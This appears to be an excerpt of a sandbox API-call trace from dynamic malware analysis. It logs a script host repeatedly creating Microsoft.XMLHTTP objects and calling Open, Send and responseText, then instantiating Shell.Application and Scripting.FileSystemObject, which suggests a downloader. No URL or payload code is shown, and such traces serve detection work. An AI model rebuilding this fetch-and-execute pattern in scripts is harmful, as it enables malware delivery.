	[0262.898] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0262.898] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0262.898] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0262.898] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0262.898] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0262.898] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0262.898] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0262.899] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0262.899] SysStringLen (param_1=0x0) returned 0x0
	[0262.899] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0262.899] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0262.899] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c70) returned 0x0
	[0262.899] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0262.899] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7818) returned 0x0
	[0262.899] ??2@YAPEAX_K@Z () returned 0x62f310
	[0262.899] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7818, pUnkSite=0x62f310) 
	[0262.899] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0262.899] XMLHTTPRequest:IUnknown:Release (This=0x49c7818) returned 0x0
	[0262.899] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c70) returned 0x0
	[0262.899] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c70) returned 0x3
	[0262.899] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0262.899] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c70, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0262.899] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0262.899] longjmp () 
	[0262.899] longjmp () 
	[0262.899] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0262.899] SysStringLen (param_1=0x0) returned 0x0
	[0262.899] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0262.899] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0262.900] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7770) returned 0x0
	[0262.900] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0262.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7770, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0262.900] ??2@YAPEAX_K@Z () returned 0x62f330
	[0262.900] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0262.900] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0262.900] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0262.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7770, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7770) returned 0x0
	[0262.900] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7770) returned 0x3
	[0262.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7770, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0262.900] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7770, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0262.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7770, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0262.900] longjmp () 
	[0262.900] longjmp () 
	[0262.900] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0262.900] SysStringLen (param_1=0x0) returned 0x0
	[0262.900] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0262.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0262.900] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0262.900] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0262.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0262.900] ??2@YAPEAX_K@Z () returned 0x62f310
	[0262.900] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f310) 
	[0262.901] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0262.901] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0262.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0262.901] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0262.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0262.901] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0262.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0262.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0262.901] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0262.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0263.061] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0263.062] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0263.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0263.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0263.062] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0263.062] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0263.062] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0263.062] SysStringLen (param_1=0x0) returned 0x0
	[0263.062] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0263.062] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0263.062] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0263.062] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0263.062] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0263.063] ??2@YAPEAX_K@Z () returned 0x62f350
	[0263.063] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0263.063] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0263.063] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0263.063] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0263.063] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0263.063] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0263.063] SysStringLen (param_1=0x0) returned 0x0
	[0263.063] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0263.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0263.066] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0263.066] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0263.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0263.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0263.066] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0263.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0263.761] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0263.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0263.762] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0263.762] SysStringLen (param_1=0x0) returned 0x0
	[0263.762] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0263.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0263.762] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0263.762] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0263.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0263.763] ??2@YAPEAX_K@Z () returned 0x62f310
